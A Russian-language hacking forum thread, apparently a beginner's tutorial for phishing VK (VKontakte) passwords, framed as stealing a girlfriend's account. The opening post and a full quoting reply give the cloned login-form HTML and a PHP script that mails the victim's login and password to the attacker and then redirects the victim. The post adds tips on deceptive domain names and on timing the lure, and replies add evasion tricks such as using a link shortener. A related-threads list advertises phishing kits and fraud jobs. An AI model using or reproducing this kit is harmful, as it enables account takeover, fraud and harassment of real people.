Фишинг для самых маленьких

  • Автор темы Gidroponika
  • Дата начала
G

Gidroponika

Всем здарова, ребятишки. Сегодня мы будем воровать пароль от вк у вашей подружки. Для этого нам понадобится любой текстовый редактор на ваш вкус, хостинг с поддержкой php, и ftp клиент чтоб залить все ваше творчество на хостинг.
Сначала открываем страницу входа в вк, не ту что появляется первой ссылкой, а вот такую:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Тыкаем правой кнопкой и скачиваем себе на комп. Далее открываем скачаный html файл в текстовом редакторе и находим вот такие строки:


HTML:
<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login">
    <input type="hidden" name="act" value="login" />
    <input type="hidden" name="role" value="al_frame" />
    <input type="hidden" name="expire" id="quick_expire_input" value="" />
    <input type="hidden" name="captcha_sid" id="quick_captcha_sid" value="" />
    <input type="hidden" name="captcha_key" id="quick_captcha_key" value="" />
    <input type="hidden" name="_origin" value="https://vk.com" />
    <input type="hidden" name="ip_h" value="08695bb0515f567d1a" />
    <input type="hidden" name="lg_h" value="fe00f4b8112e1f6b68" />
    <div class="label">Телефон или e-mail</div>
    <div class="labeled"><input type="text" name="email" class="dark" id="quick_email" /></div>
    <div class="label">Пароль</div>
    <div class="labeled"><input type="password" name="pass" class="dark" id="quick_pass" onkeyup="toggle('quick_expire', !!this.value);toggle('quick_forgot', !this.value)" /></div>
    <input type="submit" class="submit" />
  </form>
Пока их не трогаем, создаем в папке с этим файлом тек

Пока их не трогаем, создаем в папке с этим файлом текстовый файл с расширением php, открываем его и вставляем туда этот скрипт



PHP:
<?php

    $result = mail("[email protected]" ,"Лови, братиш" " \nЛогин: $_POST[email] \nПароль: $_POST[pass] ");
    if ($result) {
        echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL= /'></head></html>";
    }
    else {
        echo "<p>Eror. This shit is dont work</p>";
    }
?>


Там где должен быть емейл прописываем свой, далее открываем любой мемчик в вк и после URL= вставляем ссылку на него. Далее узнаете зачем это нужно. Сохраняем этот файл. Возвращаемся к html файлу и в самом верху видим "action=" вместо той ссылки указываем путь к нашему php файлу, если они в одной папке, то просто прописываем имя файла вместе с расшерением. Сохраняем.

Заливаем эти два файла на хостинг вместе с папкой со стилями и js скриптами которая скачалась вместе с html файлом. Даем имя домену что-то типа "vck" или "memes228" чтоб в адресной строке не сильно палилось.

И у нас все готово. Но что собственно мы вообще сделали? При переходе по вашей ссылке у жертвы откроется окно авторизации, она подумает, что все нормально, бывает. Введет свой логин и пароль, дальше жертву перенаправит на тот самый мемчик который вы ей скинули.

А данные отправляться к вам на почту которую вы указали в php файле, среди сотен сообщений от warface и танков вы найдете сообщение с паролем. Все, красавцы, кулхацкеры, мистеры роботы. Но только такой способ очень уж древний и про него любой нормальный человек знает и скорее всего вас пошлют туда откуда вы вылезли при рождении, да ещё и наваляют в школе. Но на всяких тпшках и быдлоте с вашего подьезда, которые отбирают у Вас мелочь, проканает. Да и администрация быстро пропаливает такие ссылки, за дня 3 уже заблокируют, поэтому кидайте жертве когда она гарантировано перейдет по ней. Ну и самое главное правильно навешать лапши на уши ибо все провалиться даже не начавшись. Для надежности можно потренироваться на друзьях. Вот и все)
 
B

BonviP

Всем здарова, ребятишки. Сегодня мы будем воровать пароль от вк у вашей подружки. Для этого нам понадобится любой текстовый редактор на ваш вкус, хостинг с поддержкой php, и ftp клиент чтоб залить все ваше творчество на хостинг.
Сначала открываем страницу входа в вк, не ту что появляется первой ссылкой, а вот такую:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Тыкаем правой кнопкой и скачиваем себе на комп. Далее открываем скачаный html файл в текстовом редакторе и находим вот такие строки:


HTML:
<form method="POST" name="login" id="quick_login_form" action="https://login.vk.com/?act=login">
    <input type="hidden" name="act" value="login" />
    <input type="hidden" name="role" value="al_frame" />
    <input type="hidden" name="expire" id="quick_expire_input" value="" />
    <input type="hidden" name="captcha_sid" id="quick_captcha_sid" value="" />
    <input type="hidden" name="captcha_key" id="quick_captcha_key" value="" />
    <input type="hidden" name="_origin" value="https://vk.com" />
    <input type="hidden" name="ip_h" value="08695bb0515f567d1a" />
    <input type="hidden" name="lg_h" value="fe00f4b8112e1f6b68" />
    <div class="label">Телефон или e-mail</div>
    <div class="labeled"><input type="text" name="email" class="dark" id="quick_email" /></div>
    <div class="label">Пароль</div>
    <div class="labeled"><input type="password" name="pass" class="dark" id="quick_pass" onkeyup="toggle('quick_expire', !!this.value);toggle('quick_forgot', !this.value)" /></div>
    <input type="submit" class="submit" />
  </form>
Пока их не трогаем, создаем в папке с этим файлом тек

Пока их не трогаем, создаем в папке с этим файлом текстовый файл с расширением php, открываем его и вставляем туда этот скрипт



PHP:
<?php

    $result = mail("[email protected]" ,"Лови, братиш" " \nЛогин: $_POST[email] \nПароль: $_POST[pass] ");
    if ($result) {
        echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL= /'></head></html>";
    }
    else {
        echo "<p>Eror. This shit is dont work</p>";
    }
?>


Там где должен быть емейл прописываем свой, далее открываем любой мемчик в вк и после URL= вставляем ссылку на него. Далее узнаете зачем это нужно. Сохраняем этот файл. Возвращаемся к html файлу и в самом верху видим "action=" вместо той ссылки указываем путь к нашему php файлу, если они в одной папке, то просто прописываем имя файла вместе с расшерением. Сохраняем.

Заливаем эти два файла на хостинг вместе с папкой со стилями и js скриптами которая скачалась вместе с html файлом. Даем имя домену что-то типа "vck" или "memes228" чтоб в адресной строке не сильно палилось.

И у нас все готово. Но что собственно мы вообще сделали? При переходе по вашей ссылке у жертвы откроется окно авторизации, она подумает, что все нормально, бывает. Введет свой логин и пароль, дальше жертву перенаправит на тот самый мемчик который вы ей скинули.

А данные отправляться к вам на почту которую вы указали в php файле, среди сотен сообщений от warface и танков вы найдете сообщение с паролем. Все, красавцы, кулхацкеры, мистеры роботы. Но только такой способ очень уж древний и про него любой нормальный человек знает и скорее всего вас пошлют туда откуда вы вылезли при рождении, да ещё и наваляют в школе. Но на всяких тпшках и быдлоте с вашего подьезда, которые отбирают у Вас мелочь, проканает. Да и администрация быстро пропаливает такие ссылки, за дня 3 уже заблокируют, поэтому кидайте жертве когда она гарантировано перейдет по ней. Ну и самое главное правильно навешать лапши на уши ибо все провалиться даже не начавшись. Для надежности можно потренироваться на друзьях. Вот и все)
нАДО ПОПРОБОВАТЬ)
 
D

demasssu

сенкс автору за подобное. лови лайлайклайк
 
S

shamoon

годно)
зарегал домен в ру зоне за сотку, и через сокращатор vk-шный норм скармливается, почти не заметно после перехода подвоха
Посмотреть вложение 5251
 
A

AlexMall

Уже есть сайты с готовыми фейк-ссылками. Создавать свои нет смысла
 
N

nictic123

У меня такие ссылки за пол дня банили))
 
M

morpexbro

а что делать если код html вк? где-то часть кода в html есть, а в примере нету. что с ними делать? изменять?
 
Название темы
Автор Заголовок Раздел Ответы Дата
Support81 102 года за фишинг: афера на $1,5 млн закончилась для мошенников тюремной камерой Новости в сети 0
U Интересно PHP - Пишем свой фишинг скрипт для кражи тт аккаунтов {Уровень: EASY} Другие ЯП 10
CMDfromBAT Интересно RECREATOR-PHISHING - ЛУЧШИЙ ФИШИНГ ДЛЯ ЛЮБОЙ СТРАНИЦЫ! KALI LINUX СИ/Фишинг/Мошенничество 31
A Фишинг-сайты (забираем карту и все данные владельца) и сайты для инсталлов. Ищу работу. Предлагаю свои услуги. 0
J Фишинг панель для взлома соц.сетей и почт СИ/Фишинг/Мошенничество 13
Admin Самый просто фишинг для начинающих! Полезные статьи 13
Support81 Побег из зала суда, фишинг в Teams и $600 тысяч наличными — всё, что осталось от Black Basta Новости в сети 0
turbion0 Мошенники выдают фальшивые акции банков в Telegram и воруют деньги через фишинг Новости в сети 0
Support81 SVG-фишинг атакует под видом аудио: нажал — ввёл — отдал пароль Новости в сети 0
Support81 Фишинг с печатью Google — как злоумышленники смогли обмануть DKIM Новости в сети 0
Support81 Когда MFA бессильна: AiTM-фишинг становится всё популярнее у злоумышленников Новости в сети 0
Support81 Microsoft сокрушила фишинг-империю: уничтожено 240 сайтов MRxC0DER Новости в сети 0
Support81 Фишинг нового поколения: как антибот-сервисы обходят «красную страницу» Google Новости в сети 0
Support81 Фишинг-тест вызвал массовую панику в Университете США Новости в сети 0
Support81 Осторожно, груз опасен: глобальная фишинг-атака на промышленные компании Новости в сети 0
Support81 «Колесо Фортуны» и фишинг: изощренные схемы обмана покупателей Ozon Новости в сети 1
Support81 Масштабный фишинг охватил правительства Европы, Америки и Азии Новости в сети 0
Support81 Фишинг-кит CryptoChameleon ориентирован на пользователей мобильных устройств Новости в сети 0
Support81 Фишинг, достойный адвоката: Scaly Wolf атакует российские компании юридически безупречными письмами Новости в сети 0
Support81 Адаптивный фишинг отключает бдительность жертв: какие приёмы используют злоумышленники Новости в сети 0
Support81 BulletProofLink: Занавес опустился на фишинг империю Новости в сети 0
G ФИШИНГ СТИМ | ЛОГИ ВАМ | БЕРЕМ НОВИЧКОВ Предоставляю работу. Ищу специалиста. 3
S Фишинг Вопросы и интересы 3
S1leNt Фишинг-Сценарии (465 шт) СИ/Фишинг/Мошенничество 2
Eteriass Фишинг на Kali linux/Shellphish/ СИ/Фишинг/Мошенничество 17
X /HumenError/Фишинг instagram/Kali linux/ СИ/Фишинг/Мошенничество 10
K Фишинг токенов Qiwi СИ/Фишинг/Мошенничество 1
K Фишинг скрипт(Раздача голосов, стикеров и т.п.) СИ/Фишинг/Мошенничество 2
S Фишинг(фэйк) Hydra СИ/Фишинг/Мошенничество 0
K [СЛИВ] Лучший фишинг Вконтакте 8 шаблонов. СИ/Фишинг/Мошенничество 2
A Alino4kaTeam Набор спамеров на фишинг вк. 13 ФЕЙКОВ НА ВЫБОР Предоставляю работу. Ищу специалиста. 0
U фишинг с авторизацией и двухфакторкой Полезные статьи 0
S Взлом социальных сетей через локалку на андроиде (Фишинг) СИ/Фишинг/Мошенничество 7
F Фишинг ВК скрипт / "Накрутка лайков" Способы заработка 3
F Фишинг ВК Способы заработка 6
J Фишинг пак СИ/Фишинг/Мошенничество 0
G Фишинг Полезные статьи 0
K Уроки по XSS: Урок 2. Скрытая передача данных, перехват нажатия клавиш, изменение внешнего вида сайта, подцепление на BeEF, фишинг, подсказки обхода ф Уязвимости и взлом 0
R Пассивный фишинг\скам от 4к в день Способы заработка 0
G Халява, Слив фишинг скрипт "Петиция" Другое 0
K Что такое фишинг. Тактики и инструменты. Уязвимости и взлом 0
D Kali Linux фишинг сайтов (как взламать страницу) Полезные статьи 0
X Взлом ВК. (фишинг) СИ/Фишинг/Мошенничество 24
Admin Psw adm, Соц. инжинерия, Фишинг, Drive-by Полезные статьи 0
АнАлЬнАя ЧуПаКаБрА Фишинг вк [С отправкой лога и пароля вам в личные сообщения] Другое 8
Support81 Шпион из ЦРУ превратил Telegram в площадку для государственной тайны Новости в сети 0
Support81 SMS для Google и Meta? Перешлём через Намибию, Чечню и швейцарский гараж Новости в сети 0
wrangler65 Katz Stealer: новая опасная малварь для кражи данных с функциями скрытности и модульности Новости в сети 0
wrangler65 Киберпартизаны атакуют: новый бэкдор Vasilek использует Telegram для управления зараженными системами Новости в сети 0
smmgoal Интересно BrownVPN – Ваш надежный VPN для конфиденциальности, безопасности и свободы Ищу работу. Предлагаю свои услуги. 0

Название темы